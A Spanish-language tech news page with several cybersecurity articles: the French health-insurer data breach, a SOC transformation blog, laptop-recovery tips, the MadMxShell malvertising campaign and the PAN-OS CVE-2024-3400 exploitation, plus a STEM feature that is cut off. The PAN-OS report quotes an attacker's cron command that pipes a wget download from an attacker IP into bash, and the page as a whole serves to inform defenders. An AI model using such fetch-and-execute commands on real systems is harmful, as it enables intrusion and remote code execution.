Todo lo que necesitas saber sobre tecnología

Categoría: Ciberseguridad Página 1 de 60

Francia sufre la mayor filtración de datos de su historia: lo que necesita saber

Dos violaciones masivas de datos en Francia han afectado aproximadamente a la mitad de la población del país. Los datos de aproximadamente 33 millones de personas se han visto comprometidos, lo que la convierte en la mayor violación de datos jamás vivida en el país. Los atacantes se dirigieron a dos proveedores franceses de servicios de pagos sanitarios, Viamedis y Almerys. Ambas empresas gestionan los pagos de terceros para los seguros médicos en Francia. Según la CNIL (Commission nationale de l’informatique et des libertés), la agencia de protección de datos de Francia, los datos se vieron comprometidos durante dos violaciones separadas que ocurrieron a principios de febrero. Según un comunicado emitido por la CNIL, los registros afectados de los asegurados y sus familiares incluyen: Estado civil. Fecha de nacimiento y número de seguro social. El nombre del asegurador de salud, así como las garantías del contrato. La CNIL afirmó además que datos como información bancaria, datos médicos, reembolsos de salud, datos postales, números de teléfono y correos electrónicos no fueron barridos por las violaciones. ¿Qué está en juego con la violación de datos francesa? La preocupación con esta vulneración, como con cualquier otra, es cómo esta información vulnerada podría combinarse con información de otras vulneraciones. En conjunto, los malos actores podrían usar esa información combinada para realizar ataques posteriores, incluido el robo de identidad. Por ello, la CNIL sugiere a los asegurados lo siguiente: desconfíen de las solicitudes que puedan recibir, especialmente si se refieren al reembolso de gastos sanitarios. Verifique periódicamente las actividades y movimientos de sus distintas cuentas. Mientras tanto, la CNIL afirmó que está investigando el ataque más a fondo, en particular para determinar si las medidas de seguridad implementadas estaban en línea con los estándares y obligaciones de datos europeos. ¿Qué puedo hacer si creo que mi información quedó atrapada en la violación de datos francesa? Cada vez que ocurre una violación de datos, significa que su información personal podría terminar en manos de un mal actor. En vista de esto, hay algunos pasos que puede tomar para protegerse después de una violación de datos, lo que implica una combinación de pasos preventivos y algo de monitoreo de su parte. Informe el uso no autorizado de su información o cuentas de inmediato. Como señala la CNIL, esté atento a su cuenta. Si nota alguna actividad inusual, notifique a Viamedis o Almerys inmediatamente. Esté atento a los ataques de phishing. Con cierta información personal en la mano, los malos actores podrían buscar más. Es posible que, tras una infracción, realicen rondas de ataques de phishing que le dirijan a sitios falsos diseñados para robar su información personal. Por lo tanto, siempre es aconsejable mantener un ojo escéptico abierto ante mensajes no solicitados que le solicitan información, a menudo de manera que lo instan o presionen a actuar. Esté siempre atento a los ataques de phishing, especialmente después de infracciones. Con eso, puede investigar McAfee Scam Protection. Utiliza IA que detecta enlaces sospechosos en correos electrónicos, mensajes de texto y mensajes de redes sociales. Además, puede bloquear sitios riesgosos si accidentalmente hace clic o toca un enlace. Cambie sus contraseñas y utilice un administrador de contraseñas. Si bien no parece que la información de inicio de sesión se haya visto afectada, la actualización de la contraseña sigue siendo una medida de seguridad sólida. Lo mejor son las contraseñas seguras y únicas, lo que significa que nunca reutilices tus contraseñas en diferentes sitios y plataformas. El uso de un administrador de contraseñas le ayudará a estar al tanto de todo y, al mismo tiempo, almacenará sus contraseñas de forma segura. Además, cambiar sus contraseñas con regularidad puede hacer que una contraseña robada pierda su valor porque está desactualizada. Habilite la autenticación de dos factores. Si bien una contraseña segura y única es una buena primera línea de defensa, habilitar la autenticación de dos factores en todas sus cuentas ayudará a su causa al proporcionar una capa adicional de seguridad. Es cada vez más común ver hoy en día que los bancos y todo tipo de servicios en línea solo permiten el acceso a sus cuentas después de haber proporcionado un código de acceso único enviado a su correo electrónico o teléfono inteligente. Si sus cuentas admiten la autenticación de dos factores, habilítela. Considere utilizar el monitoreo de identidad. La información violada y robada a menudo termina en mercados de la web oscura donde los piratas informáticos, estafadores y ladrones la compran para cometer aún más delitos. Antes era difícil saber si su información estaba atrapada en dichos mercados, pero ahora un servicio de Monitoreo de Identidad puede hacer el trabajo de detective por usted. El servicio de McAfee monitorea la web oscura en busca de su información personal, incluido el correo electrónico, identificaciones gubernamentales, identificaciones médicas, información de tarjetas de crédito y cuentas bancarias, y más. Esto puede ayudar a mantener segura su información personal con alertas tempranas que le muestran si sus datos se encuentran en la web oscura, un promedio de 10 meses antes que servicios similares. A partir de ahí, obtendrá orientación sobre la que puede actuar, que puede ayudar a proteger su información y sus cuentas contra posibles robos. También ofrecemos servicios de restauración de identidad a través de nuestras suscripciones a McAfee+ Ultimate. La restauración de identidad incluye acceso a expertos que pueden ayudar a generar un plan eficaz y eficiente para restaurar rápidamente su identidad, de modo que no tenga que abordar el problema usted mismo. Considere la posibilidad de utilizar una protección integral en línea. Un conjunto completo de software de protección en línea puede ofrecer capas de seguridad adicional. Le ofrece las herramientas y servicios enumerados anteriormente, junto con otras funciones que pueden protegerlo en línea. Eso incluye una VPN para mantener su tiempo en línea más privado de la recopilación de datos en línea y al mismo tiempo protegerlo de los ladrones que intentan robar información de cuentas y tarjetas de crédito. También incluye protección de navegación web que puede advertirle sobre sitios web sospechosos y descargas maliciosas que buscan robar su información. En definitiva, se trata de una protección exhaustiva para sus dispositivos, su privacidad y su identidad. Y en una época de filtraciones de datos, ese tipo de protección se ha vuelto esencial. La violación de datos francesa y las violaciones que se avecinan: usted tiene formas de protegerse. Sea usted ciudadano francés o no, la noticia de esta violación de datos le ofrece la oportunidad de reforzar sus defensas. Se producen violaciones importantes como estas, tal como vimos con la violación de Facebook en 2021, la violación de PayPal en 2023 y la violación de 23andMe, también en 2023. Tomar medidas preventivas ahora puede adelantarlo al siguiente. De esos pasos, el uso de un software integral de protección en línea es el más sólido. Una protección como la nuestra salvaguarda su privacidad, identidad y dispositivos en amplitud y profundidad, protegiéndolo de filtraciones de datos y todo tipo de estafas y ataques que a menudo les siguen. Presentamos McAfee+ Ultimate Protección contra robo de identidad y privacidad para su vida digital Descargue McAfee+ ahora \x3Cimg height=»1″ width=»1″ style=»display:none» src=»https://www.facebook.com/tr?id =766537420057144&ev=PageView&noscript=1″ />\x3C/noscript>’);

Baby ASO: una transformación mínima viable para su SOC – Fuente: securityboulevard.com

Imagen vagamente relevante pero muy cibernética de Dall-E Un patrón que descubrí después de observar la evolución de las organizaciones de seguridad y TI a lo largo de los años, incluido mi tiempo en Gartner, es: el cambio es difícil, pero la transformación es más difícil. Quizás se trate de algún tipo de axioma de TI, seguido de un teorema I: muchos de los que dicen que quieren transformarse, en realidad no lo hacen. Y el Teorema II: muchos desean los supuestos resultados de una operación transformada, pero no pueden soportar muchos (¿alguno?) de los costos. Entonces, cuando escucho que un determinado equipo de seguridad o un centro de operaciones de seguridad (SOC) quiere transformarse a un modelo nuevo y moderno, surgen numerosos desafíos. Un factor significativo es la tendencia de las personas a apegarse a los procesos y herramientas familiares que han estado utilizando durante un período prolongado, después de invertir a veces mucha sangre, alma y fortuna (me viene a la mente el proveedor S, pero estoy divagando… esto es Realmente no se trata de SIEM). Además, puede existir la preocupación de que el nuevo modelo sea más complejo o difícil de gestionar, lo que generará aún más renuencia a adoptarlo. Este apego puede crear resistencia al cambio y dificultar la adopción de nuevos enfoques sin importar lo que suceda fuera de la organización. Parece que existe un deseo de la llamada “transformación ligera”, donde pocas cosas cambian, pero los resultados son comparables a los de una organización transformada. Para mí está muy claro que tal cosa es absolutamente imposible. Llevemos esto a nuestra discusión en curso sobre el SOC moderno. Por ejemplo, en nuestra ahora infame presentación Ghost of SOC (y un documento relacionado), hemos destacado que algunas organizaciones realmente deberían buscar una mejora incremental, no una transformación (la parte más triste es la organización que se ajusta perfectamente a los criterios de » necesidad: máxima, debe transformarse” y también se ajusta a nuestros criterios de “capacidad: ausente, absolutamente incapaz de transformarse”… no creerás lo que sucede después) ¡Oye, incluso Gartner está de acuerdo con esto! (fuente: Gartner “La hoja de ruta de TI para la transformación empresarial digital”) Como recordarán, esbozamos una visión que solíamos llamar operación de seguridad autónoma en el documento original (sigue siendo un recurso muy útil a pesar de la fecha de 2021). El patrón, como hemos observado a lo largo de los años, es que muchas organizaciones que administran centros de operaciones de seguridad tradicionales temen la escala requerida de cambio. Un cliente potencial con el que hablé observó con humor pero con nostalgia que cree que “pueden evolucionar allí en 200 años”. El blog Modern SOC también destaca el hecho de que ese “impulso implacable por la automatización y la mentalidad basada en la ingeniería” son difíciles para muchos equipos. Por lo tanto, no puedo prometerle que… a) le daría tres cosas que hacer que también son simples y recuerdan sus viejas prácticas, y b) que obtendrá resultados en comparación con una organización verdaderamente transformada. Realmente puedes elegir a) ob), no a) yb), GenAI o no GenAI. Peor aún, desde que se publicó el artículo sobre Operaciones de Seguridad Autonómicas (ASO), me he inclinado por la opinión de que el ADN de su SOC determina en gran medida su destino (diapositiva 11). El ADN sin SOC significa que puede escalar con las amenazas y los activos, el ADN NOC de los años 80 significa que tendrá dificultades o, en el mejor de los casos, crecerá lentamente. ¡Bien, gracias por tolerar mi perorata! Entonces, el verdadero tema de esto es: ¿Cuál es el conjunto mínimo de requisitos prácticos e implementables que le brindarían el mayor valor y posiblemente lo encaminarían hacia la transformación del SOC? Quizás la idea aquí sea la de una “Transformación Mínima Viable”… Primero, debemos estar de acuerdo con algunas cosas (¿Qué? ¿Más quejas, Anton? ¡Bueno, sí!): Es comprensible que usted necesite controlar sus expectativas. En el mejor de los casos, esto es una “transformación ligera” y, en el peor, simplemente usar las ideas que otros usaron para transformar para mejorar ligeramente. Parte de la magia ocurre en etapas posteriores de la transformación, aunque el trabajo ocurre desde la primera etapa. En otras palabras, el trabajo aumenta linealmente, pero algo de valor se produce en etapas posteriores. Eh… ¿tienes alguna buena noticia, Anton? En este enfoque de “transformación ligera”, es posible que no sea necesario reemplazar las herramientas en la etapa inicial. Para algunas organizaciones, sin embargo, es más fácil reemplazar las herramientas que cambiar los procesos de manera significativa, por lo que tal vez esto sea una “buena noticia menor”. Entonces, esto es lo que tengo: Baby ASO stack Si esto aún es demasiado complicado… eh… entonces el primer elemento que siempre destaco cuando hablo sobre este tema es asegurarme de que las personas que responden a las alertas en su SOC (analistas) comiencen a acercarse a las personas que producen detecciones (ingenieros). Esto puede significar almorzar una vez al mes, rotar los roles de cada uno durante una semana o hacer otras cosas que los lleven a entenderse mejor y, en algunos casos, convertirse en el mismo equipo más adelante. Entonces, si realmente necesitas una cosa, eso es… pero esto no te transformará, sin duda. Algunas publicaciones relacionadas (hay muchas más aquí): Baby ASO: una transformación mínima viable para su SOC se publicó originalmente en Anton en Security en Medium, donde las personas continúan la conversación destacando y respondiendo a esta historia. *** Este es un blog sindicado de Security Bloggers Network de Historias de Anton Chuvakin en Medium escrito por Anton Chuvakin. Lea la publicación original en: https://medium.com/anton-on-security/baby-aso-a-minimal-viable-transformation-for-your-soc-d6f922cac838?source=rss-11065c9e943e——2 Publicación original URL: https://securityboulevard.com/2024/04/baby-aso-a-minimal-viable-transformation-for-your-soc/Categoría y etiquetas: Gobernanza, Riesgo y Cumplimiento, Red de Bloggers de Seguridad, aso, secops, operaciones de seguridad,centro-de-operaciones-de-seguridad,SOC – Gobernanza, Riesgo y Cumplimiento,Red de blogueros de seguridad,aso,secops,operaciones de seguridad,centro-de-operaciones-de-seguridad,SOC

¿Cómo encontrar una computadora portátil perdida?

¿Cómo encontrar una computadora portátil perdida? ¿Es usted profesional, estudiante, ama de casa, propietario de un negocio o incluso agricultor en estos días? Las computadoras portátiles se han convertido en una parte increíble de la vida de casi todos. Hay infinitas actividades para hacer y medios ilimitados para explorar. Son muy queridos por quien los utiliza, algo personales, diría yo. Pero, ¿ha pensado en lo que se siente cuando algo valioso, utilizable y personal se pierde o se lo roban? ¿Qué emociones, como el miedo, rondan por ahí? ¡Temblando, supongo! ¿Alguna vez has experimentado algo así? No he tratado de ser cauteloso mientras viajo. El 74% de los robos de portátiles se producen en viajes o en zonas públicas. Hoy en día, los portátiles se han convertido en una parte inseparable de la vida. Son herramientas esenciales tanto para uso profesional como personal. Con una amplia capacidad de almacenamiento, las computadoras portátiles almacenan información y datos, lo que las convierte en activos cruciales para organizaciones e individuos. Aún así, al dispositivo a veces le han crecido un par de patas o ha jugado al escondite. A medida que el siglo XXI se vuelve más tecnológico y avanzado, las amenazas y sus actores también han avanzado, y nosotros estamos en su radar. A diferencia de los teléfonos móviles, cuando te lo roban, no puedes llamar, pero puedes rastrear tu computadora portátil. ¿Cómo? Con software de seguimiento de portátiles. Pero debe estar preinstalado antes de perderlo ante alguien o en cualquier lugar. Una computadora portátil robada es una pesadilla, y más aún para un departamento de TI responsable de recuperar la computadora portátil perdida sin perder ninguna información vital a manos de los malos. En situaciones tan cruciales, el personal de TI debe estar preparado para situaciones inesperadas instalando software de localización de portátiles, soluciones antivirus y bloqueadores de puertos para que no se filtre información del portátil y pueda recuperarse sin problemas. Un asombroso 97% de las computadoras robadas nunca se vuelven a encontrar. Se estima que el coste anual de los ordenadores empresariales robados supera los 3.500 millones de dólares (Fuente: informe Gitnux Marketdata 2024). Cómo rastrear y recuperar una computadora portátil robada Ahora bien, primero debe saber que siempre es mejor prevenir que curar. Por lo tanto, mantener su computadora portátil protegida contra robos también es crucial. La mejor manera de recuperar su computadora portátil perdida es mediante un software de localización de computadoras portátiles. Cada individuo u organización debe instalar un localizador de portátiles en su sistema para que pueda recuperarse a tiempo. Recuperación de una computadora portátil perdida o robada con Windows 10 Si tiene una computadora portátil con Windows 10 o una versión superior, puede ubicarla usando la aplicación «Buscar mi dispositivo». Naturalmente, debes tener este servicio activado para utilizarlo. Si ya está habilitado: visite la página de administración de dispositivos en Microsoft. Elija el dispositivo que desea localizar. Haga clic en «Buscar mi dispositivo» y ¡listo! Para activarlo: presione la tecla «Inicio» o la combinación de teclas CTRL+S. Busque «Buscar mi dispositivo». Activa esta característica. Siga las instrucciones anteriores para probar esta opción. ¿Has perdido tu computadora portátil Mac? El más caro y el más exclusivo, creo. Aproximadamente el 4,5% de los participantes en un estudio indio de 2023 que tenían entre 18 y 24 años tenían computadoras Apple. Le siguieron el 3,7% de los encuestados menores de 18 años. Según el mismo informe, HP y Dell tienen una cuota de mercado combinada de más del 55% en la industria india de portátiles (Fuente: Statista) ¿Tiene una Macbook? Si es así, esto es para ti. Una computadora portátil Mac robada se puede recuperar siguiendo los pasos que expliqué anteriormente en el caso de Windows. Los dispositivos Apple vienen con dispositivos de seguimiento preinstalados. Por supuesto, debes activarlos con antelación. En caso de que ya esté activado: abra la aplicación Buscar mi en otro dispositivo Apple, luego elija la pestaña Dispositivos. Vaya a iCloud.com/find online, inicie sesión y luego seleccione «Todos los dispositivos». Seleccione el dispositivo MAC que necesita localizar. En caso de que quieras activarlo, entonces; Navegue hasta «Configuración del sistema» en el menú Apple de su computadora portátil Mac, luego seleccione su perfil en la barra lateral en la parte superior. Si no ve su nombre, haga clic en Iniciar sesión con su ID de Apple para ingresar o crear una ID de Apple. A la derecha, seleccione «iCloud». Cuando se le solicite confirmar si permite que «Buscar mi Mac» use la ubicación de su Mac, haga clic en «Buscar mi Mac», «Activar» y «Permitir». Pruebe su configuración completando los pasos anteriores. Cómo rastrear y recuperar una computadora portátil robada usando Unistal Locate laptop Locate Laptop es un software que monitorea la ubicación de computadoras portátiles perdidas o robadas conectadas a Internet, ayudando en la recuperación y protegiendo los datos del uso no autorizado. Ayuda a proteger contra robos la información confidencial, incluidos archivos financieros y creativos. En caso de robo, informa sobre la ubicación del Laptop robado una vez conectado a Internet. También cifra los datos confidenciales de forma silenciosa sin el conocimiento del infractor, no permitiéndole hacer un mal uso de los datos vitales y confidenciales. En caso de que Locate laptop ya esté instalado: registre un informe de robo en el portal web de Locate Laptop haciendo clic en Ver informe en el panel izquierdo. El usuario debe ir a protegent.in desde aquí. Haga clic en Reportar robo. Marque la opción Informar robo – Robo y complete todos los detalles requeridos. Una vez enviado el informe de robo, el usuario recibirá informes de ubicación en el correo electrónico registrado. Tan pronto como la computadora portátil esté conectada a través de Wi-Fi, también se hará clic en su imagen y se enviará por correo. Haga clic en Ver informe de ubicación para ver la ubicación de su computadora portátil. Cada vez que cambia la ubicación de la computadora portátil, el usuario recibe el informe de ubicación en su correo electrónico. Los usuarios pueden actualizar el Informe de robo si necesitan adjuntar la copia FIR al informe. Los usuarios pueden retirar el informe de robo si han recuperado sus portátiles. Locate Laptop funciona en los sistemas operativos: Windows XP/Vista/Windows 7/ Windows 8/Window8.1 y Windows10/Windows Server 2000/2003/2008 con procesador de 800 MHZ o superior y 512 MB para Windows XP/Windows 2000/2003 1 GB para (Windows Vista/Windows 7/8/10/Server 2008) El espacio disponible en el disco duro es de 50 MB. Funciones inigualables: Tecnología WebSniff especializada. Un sitio web seguro que todos los usuarios pueden ver. Observe quién va con la Laptop asignada, como por ejemplo un empleado corporativo. Los informes incluyen datos, hora, IP pública, ubicación, nación, estado, ciudad, ISP, longitud y latitud. Cómo denunciar el robo de una computadora portátil mediante pasos interactivos Inicie el módulo de cifrado de datos de forma remota en archivos y carpetas confidenciales preespecificados. Cifra los datos incluso cuando la computadora portátil no está en línea después de un tiempo establecido. Tome una fotografía tranquila del ladrón. ¿Qué haces después de rastrear tu computadora portátil robada? ¡Guau! Ahora que ha recuperado su computadora portátil robada, necesita la ayuda de las autoridades locales. Si se extravió o lo dejó en su lugar de trabajo o en algún lugar seguro y no tiene miedo de que lo roben, seguramente podrá conseguirlo usted mismo o alguien de confianza. Pero si un ladrón la roba, probablemente necesite la ayuda de las autoridades locales para recuperar su computadora portátil robada de manera segura y sin sufrir daños. Informe su caso con toda la información que ha recopilado y las pruebas, y esta información seguramente le ayudará a recuperar su computadora portátil perdida. Además, lleve alguna evidencia auténtica que respalde su afirmación de ser el propietario de la computadora portátil. ¡Medida de precaución! Ahora que conoce todos los aspectos esenciales y la facilidad con la que puede recuperar su computadora portátil con el software de localización de computadora portátil, es mejor estar atento e instalar software como este para estar preparado para el futuro. Aquí hay solo una breve lista para ayudarlo a navegar: Cuando obtenga una computadora portátil nueva o una computadora portátil de su organización, instale primero un localizador de computadoras portátiles y una solución antivirus. Deje de utilizar software pirateado; Pueden provocarle pesadillas al inyectar malware y virus en su sistema. Esté atento cuando lleve su computadora portátil fuera de su vecindario. En un metro o transporte público lleva información para saber quién está tocando tus cosas. Revisa dos veces tu Laptop y tus pertenencias antes de abandonar el lugar. Conclusión Te he preparado información sobre cómo proteger y recuperar tu computadora portátil en caso de pérdida o robo. No entrar en pánico; mantenga la calma y tome precauciones de seguridad adicionales de antemano. Es fundamental salvaguardar cualquier información privada que pueda conservarse en el dispositivo. Esto implica cambiar las contraseñas de la computadora, proteger cualquier otro dispositivo conectado a la misma red, ponerse en contacto con los bancos y compañías de tarjetas de crédito del dispositivo, activar la autenticación de dos factores para cualquier cuenta en línea vinculada y eliminar datos privados de los proveedores de almacenamiento en la nube. Mantenerse seguro. Manténgase alerta.

La nueva ciberamenaza MadMxShell explota la typosquatting y Google Ads

Los investigadores de seguridad han descubierto un nuevo actor de amenazas que aprovecha dominios falsos que se hacen pasar por sitios auténticos de software de escaneo de IP. Zscaler ThreatLabz descubrió esta sofisticada amenaza cibernética en marzo de 2024 y describió los hallazgos en un aviso publicado el miércoles. El actor registró múltiples dominios que se asemejan a sitios de software genuinos mediante errores tipográficos y utilizó Google Ads para aumentar su visibilidad en los resultados de los motores de búsqueda. Esta estrategia tenía como objetivo atraer a víctimas desprevenidas, principalmente profesionales de TI, para que visitaran estos sitios maliciosos. La puerta trasera descubierta, llamada “MadMxShell”, emplea métodos complejos, incluida la descarga de DLL y el túnel DNS, para comunicarse con un servidor de comando y control (C2). En particular, utiliza consultas DNS MX para la comunicación C2, lo que contribuye a su naturaleza esquiva. La capacidad de la puerta trasera para evadir análisis forenses de memoria y soluciones de seguridad de red aumenta su sofisticación. La campaña está dirigida a profesionales de administración de redes y seguridad de TI, una tendencia que se alinea con ataques anteriores de grupos de amenazas persistentes avanzadas (APT) como Nobelium. Aunque la atribución aún no está clara, esta tendencia emergente resalta la importancia de la vigilancia entre los profesionales de TI. Lea más sobre Nobelium: equipos de Microsoft atacados por ataques de phishing de Midnight Blizzard El actor de amenazas aprovechó la publicidad maliciosa, los sitios de software falsificados y Google Ads para propagar el ataque. Los sitios maliciosos imitan fielmente los sitios de software legítimos, con modificaciones sutiles en el código JavaScript para redirigir a los usuarios a descargar archivos maliciosos. La puerta trasera, analizada en detalle, sigue una cadena de ataque de varias etapas que involucra técnicas de carga lateral de DLL y vaciado de procesos. Utiliza ejecutables legítimos para ejecutar la carga útil y mantener la persistencia, evadiendo la detección. El malware admite varios comandos, lo que indica un enfoque en la recopilación de información y la manipulación del sistema. El análisis de la infraestructura descubrió dominios asociados con el actor de la amenaza, revelando su modus operandi y posibles motivos. La investigación de inteligencia de código abierto (OSINT) reveló además las actividades del actor en foros clandestinos, arrojando luz sobre sus técnicas e intereses. «Si bien actualmente no podemos atribuir esta actividad a ningún actor de amenazas conocido, continuamos monitoreando cualquier nuevo desarrollo asociado con este actor de amenazas y garantizamos que nuestros clientes tengan las protecciones necesarias contra estas amenazas», se lee en el aviso de Zscaler. “También sugerimos a los usuarios que sigan las mejores prácticas de seguridad y tengan cuidado al hacer clic en enlaces que aparecen en los resultados del motor de búsqueda de Google. Los usuarios también deben asegurarse de descargar el software únicamente desde el sitio web oficial del desarrollador”. Crédito de la imagen: Alex Photo Stock/Shutterstock.com

Palo Alto Networks revela más detalles sobre la falla crítica de PAN-OS bajo ataque

20 de abril de 2024Sala de prensaVulnerabilidad/Seguridad de red Palo Alto Networks ha compartido más detalles de una falla de seguridad crítica que afecta a PAN-OS y que ha sido objeto de explotación activa en la naturaleza por parte de actores maliciosos. La compañía describió la vulnerabilidad, rastreada como CVE-2024-3400 (puntuación CVSS: 10.0), como «intrincada» y una combinación de dos errores en las versiones PAN-OS 10.2, PAN-OS 11.0 y PAN-OS 11.1 del software. . «En el primero, el servicio GlobalProtect no validó suficientemente el formato de ID de sesión antes de almacenarlos. Esto permitió al atacante almacenar un archivo vacío con el nombre de archivo elegido por el atacante», Chandan BN, director senior de seguridad de producto de Palo Alto Networks, dicho. «El segundo error (confiar en que los archivos fueron generados por el sistema) utilizó los nombres de los archivos como parte de un comando». Vale la pena señalar que, si bien ninguno de los problemas es lo suficientemente crítico por sí solo, cuando se encadenan juntos, podrían conducir a la ejecución remota de comandos de shell no autenticados. Palo Alto Networks dijo que el actor de amenazas detrás de la explotación de día cero de la falla, UTA0218, llevó a cabo un ataque de dos etapas para lograr la ejecución de comandos en dispositivos susceptibles. La actividad está siendo rastreada bajo el nombre Operación MidnightEclipse. Como lo revelaron anteriormente Volexity y la propia división de inteligencia de amenazas Unidad 42 de la compañía de seguridad de redes, esto implica enviar solicitudes especialmente diseñadas que contienen el comando a ejecutar, que luego se ejecuta a través de una puerta trasera llamada UPSTYLE. «La configuración inicial del mecanismo de persistencia por parte de UTA0218 implicó la configuración de un trabajo cron que usaría wget para recuperar una carga útil de una URL controlada por un atacante y su salida se escribiría en stdout y se canalizaría a bash para su ejecución», señaló Volexity la semana pasada. «El atacante utilizó este método para implementar y ejecutar comandos específicos y descargar herramientas de proxy inverso como GOST (GO Simple Tunnel)». La Unidad 42 dijo que no ha podido determinar los comandos ejecutados a través de este mecanismo – wget -qO- hxxp://172.233.228[.]93/póliza | bash, pero evaluó que el implante basado en trabajos cron probablemente se utilice para llevar a cabo actividades posteriores a la explotación. «En la etapa 1, el atacante envía un comando de shell cuidadosamente elaborado en lugar de una ID de sesión válida a GlobalProtect», explicó Chandan. «Esto da como resultado la creación de un archivo vacío en el sistema con un comando incrustado como nombre de archivo, elegido por el atacante». «En la etapa 2, una tarea del sistema programada desprevenida que se ejecuta regularmente utiliza el nombre de archivo proporcionado por el atacante en un comando. Esto da como resultado la ejecución del comando proporcionado por el atacante con privilegios elevados». Si bien Palo Alto Networks inicialmente señaló que la explotación exitosa de CVE-2024-3400 requería las configuraciones de firewall para la puerta de enlace GlobalProtect o el portal GlobalProtect (o ambos) y la telemetría del dispositivo habilitada, desde entonces la compañía ha confirmado que la telemetría del dispositivo no tiene relación con el problema. Esto se basa en nuevos hallazgos de Bishop Fox, que descubrió desvíos para convertir la falla en un arma de manera que no requiriera que la telemetría estuviera habilitada en un dispositivo para poder infiltrarse en ella. La compañía también ha ampliado los parches para la falla en los últimos días para cubrir otras versiones de mantenimiento comúnmente implementadas: PAN-OS 10.2.9-h1 PAN-OS 10.2.8-h3 PAN-OS 10.2.7-h8 PAN-OS 10.2 .6-h3 PAN-OS 10.2.5-h6 PAN-OS 10.2.4-h16 PAN-OS 10.2.3-h13 PAN-OS 10.2.2-h5 PAN-OS 10.2.1-h2 PAN-OS 10.2.0 -h3 PAN-OS 11.0.4-h1 PAN-OS 11.0.4-h2 PAN-OS 11.0.3-h10 PAN-OS 11.0.2-h4 PAN-OS 11.0.1-h4 PAN-OS 11.0.0-h3 PAN-OS 11.1.2-h3 PAN-OS 11.1.1-h1 PAN-OS 11.1.0-h3 A la luz del abuso activo de CVE-2024-3400 y la disponibilidad de un exploit de prueba de concepto (PoC) código, se recomienda a los usuarios que tomen medidas para aplicar las revisiones lo antes posible para protegerse contra posibles amenazas. La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) también agregó la deficiencia a su catálogo de Vulnerabilidades Explotadas Conocidas (KEV), ordenando a las agencias federales que aseguren sus dispositivos antes del 19 de abril de 2024. Según información compartida por la Fundación Shadowserver, aproximadamente 22,542 usuarios de Internet -Los dispositivos de firewall expuestos probablemente sean vulnerables al CVE-2024-3400. La mayoría de los dispositivos se encuentran en EE. UU., Japón, India, Alemania, Reino Unido, Canadá, Australia, Francia y China al 18 de abril de 2024. ¿Le resultó interesante este artículo? Síguenos en Twitter  y LinkedIn para leer más contenido exclusivo que publicamos.

Celebrando el Día Internacional de las Mujeres y las Niñas en la Ciencia

Consejos e ideas de algunos de los líderes STEM más brillantes de McAfee. En este Día Internacional de las Mujeres y las Niñas en la Ciencia, #TeamMcAfee se enorgullece de unir fuerzas con la increíble McAfee Women in Security Community (WISE) para celebrar los logros de las mujeres en ciencia, tecnología e ingeniería. y Matemáticas (STEM)! WISE es un grupo apasionado de mujeres (¡y hombres!) que se dedican a crear un entorno más inclusivo y acogedor para todos en McAfee, apoyando y empoderando activamente a la próxima generación de mujeres líderes STEM. “En WISE, creemos en fomentar una comunidad diversa y próspera donde cada individuo, independientemente de su género, pueda liberar su potencial. En este Día Internacional de las Mujeres y las Niñas en la Ciencia, estamos orgullosos de celebrar los viajes de Arati, Sai, Defne, Richa y Sowmya. Sus historias son testimonios del poder transformador de STEM y sus voces inspiran a las mujeres jóvenes a soñar en grande y perseguir su pasión por la ciencia y la tecnología”. Brenda, presidenta de WISE Arati, Sai, Defne, Richa y Sowmya ilustran el poder transformador de STEM, el impacto de McAfee y la comunidad WISE en sus viajes y sus valiosos consejos para las mujeres jóvenes que se embarcan en sus propios viajes STEM. Arati, Director sénior de Ingeniería “Durante mis días escolares, yo era un estudiante curioso al que le iba bien en ciencias y matemáticas. Mis compañeros de clase a menudo buscaban mi ayuda para comprender conceptos desafiantes, lo que alimentó mi confianza y solidificó mi amor por estos campos. Prosperé en entornos estimulantes donde podía traspasar límites y explorar todo mi potencial, y STEM ofrecía exactamente eso. Fue el camino perfecto para no sucumbir al aburrimiento de la rutina y descubrir verdaderamente lo que podía lograr. Ser parte de WISE ha sido fundamental en mi viaje STEM. Me ha brindado valiosas oportunidades para establecer contactos, conectándome con líderes inspiradores tanto dentro como fuera de McAfee a través de cumbres y conferencias. Tener acceso a diversos modelos a seguir, tanto masculinos como femeninos, impulsó mi impulso y ambición, brindándome una gran cantidad de conocimientos y orientación para recorrer mi camino profesional. Como mujer líder en la industria tecnológica, he sido testigo de muchas discusiones sobre el trabajo. equilibrio vital, igualdad de oportunidades y flexibilidad. Si bien estas son conversaciones cruciales, quiero enfatizar que no hay sustituto para la dedicación y el compromiso necesarios para sobresalir en cualquier campo. Para mujeres jóvenes que estén considerando una carrera en STEM: concéntrese en el aprendizaje continuo, alimente su pasión por la excelencia y cultive un deseo genuino de generar un impacto positivo. Priorice la preparación, la integridad y la lucha por la excelencia sobre cualquier sentido de derecho. Cuando te esfuerzas, las oportunidades, los logros y el empoderamiento surgirán de forma natural. Recuerde, es importante “retribuir”: ¡orientar a otros y elevar a la próxima generación de mujeres en STEM!” Sai: Investigador sénior de tecnología e innovación “Desde mis primeros días escolares me gustó el método de razonamiento científico basado en evidencia: utilizar experimentos y observaciones para sacar conclusiones sobre un fenómeno. Naturalmente, seguir una carrera en STEM era un camino que no podía esperar para explorar. Hoy, como investigador senior de tecnología e innovación en McAfee, sigo profundizando en lo desconocido, pero con el beneficio adicional de tener una comunidad y un equipo de apoyo a mi alrededor. Ser parte de una comunidad de apoyo como WISE es invaluable. Navegar en el mundo empresarial puede ser un desafío, y tener una red de personas que comprendan y puedan brindar orientación marca una diferencia significativa. Para las mujeres jóvenes que están considerando una carrera en STEM: si la ciencia enciende su curiosidad, sigan esa chispa. Puede haber desafíos en el camino, pero recuerde, la belleza de STEM radica en su constante evolución y sus infinitas posibilidades. Acepta el viaje, aprende de comunidades que te apoyan y, lo más importante, nunca permitas que nadie apague tu pasión por el descubrimiento”. Defne: Directora de Servicios Tecnológicos “Mi camino hacia STEM comenzó con una simple chispa: el amor por resolver problemas. Al crecer en un ambiente de apoyo, impulsado por el aliento de padres y maestros, nunca tuve miedo de hacer preguntas y ahondar en lo desconocido. Un avance rápido hasta el día de hoy, soy el Director de Servicios Tecnológicos de McAfee y dirijo un equipo que respalda el éxito de las personas y los sistemas legales. McAfee ha sido fundamental en mi crecimiento. Aquí, he abordado programas desafiantes que superaron mis límites y brindaron experiencias de aprendizaje invaluables. También tuve excelentes mentores en McAfee que me ayudaron y apoyaron. Y ser parte de la comunidad WISE fomenta un espacio para que las mujeres aprendan, colaboren y se empoderen mutuamente. Para las mujeres jóvenes que están considerando una carrera en STEM: Cree en ti misma. Encuentre mentores que lo inspiren, perfeccionen sus habilidades en matemáticas y ciencias y mejoren sus 